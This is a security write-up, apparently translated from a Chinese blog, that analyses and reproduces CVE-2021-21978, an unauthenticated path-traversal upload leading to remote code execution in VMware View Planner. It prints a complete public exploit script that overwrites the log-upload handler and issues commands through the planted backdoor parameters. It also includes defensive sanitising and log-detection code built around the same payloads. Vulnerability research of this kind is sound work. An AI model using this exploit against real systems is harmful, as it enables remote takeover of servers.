CVE-2021-21978: VM View Planner RCE Analysis and Reproduction

Author: 小泫@Timeline Sec
Disclaimer: do not use this for illegal purposes; you alone bear the consequences.


0x01 Introduction
View Planner is a testing tool released by VMware for View desktops. It lets you estimate how many View desktops can be deployed in a given application environment.


0x02 Vulnerability Overview
ID: CVE-2021-21978
The logupload endpoint of View Planner lacks input validation. An unauthenticated attacker with network access to the View Planner Harness can upload and execute a specially crafted file, resulting in remote code execution inside the logupload container.


0x03 Affected Versions

VMware View Planner <= 4.6.0


0x04 Environment Setup

Environment download:

Link: https://pan.baidu.com/s/1fE69BWvjGNaZIuggIhVabg  Extraction code: mxpd

After downloading, import the image directly as a virtual machine.

The final interface looks like the screenshot below.

[screenshot]


0x05 Vulnerability Reproduction
EXP address:
https://github.com/skytina/CVE-2021-21978

The VMware View Planner web management interface exposes an entry point for uploading log files. It performs no authentication, and the path the uploaded log file is written to is user-controlled, so the log-upload handler file log_upload_wsgi.py itself can be overwritten through this upload.

[screenshot]


    # -*- coding: utf-8 -*-
    # @Time   : 2021/3/5 1:38 PM
    # @Author : skytina
    # @File   : CVE-2021-21978.py
    import requests, json, sys
    import urllib3

    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


    def exploit(url):
        # Local file that gets uploaded in place of the log-upload handler
        payload_fname = 'upload.txt'
        # itrLogPath is not normalized by the endpoint, so the traversal
        # sequence lands the upload in the handler's own directory
        logMetaData = {
            "itrLogPath": "../../../../../../etc/httpd/html/wsgi_log_upload",
            "logFileType": "log_upload_wsgi.py",
            "workloadID": "2"
        }
        vul_path = '/logupload?logMetaData={logMetaData}'.format(
            logMetaData=json.dumps(logMetaData)
        )
        # with open('./upload.txt','r') as f:
        #     with open(payload_fname,'w+') as wf:
        #         command_to_execute = "{command} > /etc/httpd/html/logs/.debug.log" \
        #             .format(command=command)
        #         content = f.read()
        #         content_w = content.replace(
        #             "{command_to_execute}", command_to_execute
        #         )
        #         wf.write(content_w)
        req_url = "{url}{vul_path}".format(
            url=url,
            vul_path=vul_path
        )
        files = {
            "logfile": open(payload_fname, "r")
        }
        try:
            r = requests.post(req_url, files=files, verify=False)
            # print(r.content.decode())
            # Verify by asking the replaced handler to echo a known marker
            cmd_r = cmd(url, 'echo "NiuNiu2020" |base64')
            # print(cmd_r)
            if "Tml1Tml1MjAyMAo=" in str(cmd_r):
                return True
            else:
                return False
        except Exception as e:
            print(str(e))
            return False


    def cmd(url, command):
        cmd_url = "{url}/logupload?secert=NiuNiu2020&command={command}".format(
            url=url,
            command=command
        )
        try:
            resp = requests.get(cmd_url, verify=False)
            return resp.content.decode()
        except Exception as e:
            return str(e)


    def usage():
        help = "[*] python3 CVE-2021-21978.py url\n\tpython3 CVE-2021-21978.py https://192.168.80.3"
        print(help)


    # exploit('https://192.168.80.3','whoami')
    if __name__ == "__main__":
        if len(sys.argv) < 2:
            usage()
        else:
            url = sys.argv[1]
            if url.startswith("http://") or url.startswith("https"):
                if exploit(url):
                    cmd_url = "{url}/logupload?secert=NiuNiu2020&command={command}".format(
                        url=url,
                        command="command"
                    )
                    outmsg = "[*]{url} is vulnerable\n[*]You can execute command like This: {cmd_url}".format(
                        url=url,
                        cmd_url=cmd_url
                    )
                    print(outmsg)
            else:
                usage()

[screenshot]

[screenshot]


0x06 Vulnerability Analysis

[screenshot]

As the screenshot shows, the apache configuration points the logupload endpoint at the file

/etc/httpd/html/wsgi_log_upload/log_upload_wsgi.py

The path /etc/httpd/html/ is actually a path inside the container; on the host it corresponds to /root/viewplanner/httpd.

[screenshot]

Locate the file

/root/viewplanner/httpd/wsgi_log_upload/log_upload_wsgi.py

[screenshot]

Because the handler neither normalizes nor filters the path, a lightly crafted request is enough to upload a malicious file to an arbitrary path, which makes it possible to overwrite the log_upload_wsgi.py file and achieve remote code execution.
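As a defensive companion to the analysis above (example code written for this page, not code from the original post, from the PoC author or from VMware), the following Python shows two things: how a logupload handler could derive the destination file from the logMetaData fields the PoC uses (itrLogPath, logFileType, workloadID) without letting them escape the log directory or produce a file the WSGI server would execute, and a detector that runs over Apache-style access log lines and flags both the traversal upload and the PoC's follow-up command requests. The log directory layout, the forced .log extension, the log format and the sample log lines are assumptions constructed for this example.

```python
import json
import os
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for each logMetaData field: one path segment, no separators.
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9._-]{1,64}")


def safe_log_target(log_root, itr_log_path, log_file_type, workload_id):
    """Return the canonical destination path for an upload, or raise ValueError.
    Field names follow the PoC's logMetaData; the layout is an assumption."""
    fields = (("itrLogPath", itr_log_path),
              ("logFileType", log_file_type),
              ("workloadID", workload_id))
    for name, value in fields:
        # Reject separators, control characters and dot-only names such as ".."
        if (not isinstance(value, str)
                or not SAFE_SEGMENT.fullmatch(value)
                or set(value) <= {"."}):
            raise ValueError(f"rejected {name}={value!r}")
    root = os.path.realpath(log_root)
    # Forced extension: an upload can never become a .py that mod_wsgi would load.
    target = os.path.realpath(
        os.path.join(root, itr_log_path, workload_id, log_file_type + ".log"))
    # Canonical containment check, independent of the allow-list above.
    if os.path.commonpath([root, target]) != root:
        raise ValueError("destination escapes the log root")
    return target


def is_allowed_target(log_root, itr_log_path, log_file_type, workload_id):
    """Boolean wrapper for callers that only need a verdict."""
    try:
        safe_log_target(log_root, itr_log_path, log_file_type, workload_id)
        return True
    except ValueError:
        return False


# Common-log-format line: client, identd, user, [time], "request", status, size
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
META_FIELDS = ("itrLogPath", "logFileType", "workloadID")


def flag_logupload_requests(lines):
    """Return (client_ip, method, reasons) for every suspicious /logupload request."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/logupload":
            continue
        query = parse_qs(parts.query)  # percent-decodes the JSON for us
        reasons = []
        raw_meta = query.get("logMetaData", [None])[0]
        if raw_meta is not None:
            try:
                meta = json.loads(raw_meta)
            except json.JSONDecodeError:
                meta = None
            if not isinstance(meta, dict):
                reasons.append("malformed logMetaData")
            else:
                for field in META_FIELDS:
                    value = str(meta.get(field, ""))
                    if "/" in value or "\\" in value or ".." in value:
                        reasons.append(f"path traversal in {field}")
                    if value.endswith((".py", ".wsgi")):
                        reasons.append(f"script filename in {field}")
        # The PoC drives its implanted handler through these two query parameters.
        if "command" in query or "secert" in query:
            reasons.append("PoC command parameters")
        if reasons:
            hits.append((m.group("ip"), m.group("method"), reasons))
    return hits


# Constructed sample log: a benign upload, the PoC's traversal upload,
# one follow-up command request and one unrelated request.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [05/Mar/2021:13:38:01 +0000] "POST /logupload?logMetaData='
    '%7B%22itrLogPath%22%3A%22iteration1%22%2C%22logFileType%22%3A%22perf%22'
    '%2C%22workloadID%22%3A%222%22%7D HTTP/1.1" 200 17',
    '203.0.113.9 - - [05/Mar/2021:13:40:12 +0000] "POST /logupload?logMetaData='
    '%7B%22itrLogPath%22%3A%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml'
    '%2Fwsgi_log_upload%22%2C%22logFileType%22%3A%22log_upload_wsgi.py%22'
    '%2C%22workloadID%22%3A%222%22%7D HTTP/1.1" 200 17',
    '203.0.113.9 - - [05/Mar/2021:13:40:15 +0000] "GET /logupload?secert='
    'NiuNiu2020&command=whoami HTTP/1.1" 200 5',
    '10.0.0.5 - - [05/Mar/2021:13:41:00 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, method, reasons in flag_logupload_requests(SAMPLE_ACCESS_LOG):
        print(ip, method, "; ".join(reasons))
```

Run the file directly to print the flagged requests from the constructed log. The two checks in safe_log_target are deliberately independent: the allow-list rejects separators before any path is built, and the realpath containment check would still catch a value like ".." even if the allow-list were loosened later, which is exactly the normalization step the vulnerable handler lacks.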


0x07 Remediation

Upgrade to the latest version.

References:

https://paper.seebug.org/1495/

https://github.com/skytina/CVE-2021-21978

https://mp.weixin.qq.com/s/mBL9kYptreo62g4IonXSLg



This article was first published on the WeChat public account Timeline Sec: CVE-2021-21978: VM View Planner RCE Analysis and Reproduction